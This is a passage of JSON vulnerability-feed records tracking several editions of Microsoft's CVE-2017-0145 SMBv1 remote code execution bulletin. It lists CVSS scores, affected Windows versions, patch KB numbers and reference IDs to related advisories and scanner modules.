"KB4012598", "KB3205401", "KB4014077", "KB4013429", "KB4012213", "KB4012606", "KB3213986", "KB3210720", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T06:50:25", "differentElements": ["msAffectedSoftware"], "edition": 24}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T08:45:32", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB3177186", "KB3205409", "KB4012598", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB4013198", "KB4013429", "KB3210720", "KB4012606", "KB4012213", "KB3210721", "KB4012216", "KB4012214", "KB4012212", "KB4014077", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T08:45:32", "differentElements": ["msAffectedSoftware"], "edition": 25}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T10:45:12", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4013198", "KB4012213", "KB3205409", "KB4012598", "KB4012216", "KB4014077", "KB4012217", "KB4012212", "KB3177186", "KB3210720", "KB3213986", "KB3205401", "KB4012606", "KB3210721", "KB4013429", "KB4012215", "KBMS16-110, 3187754", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 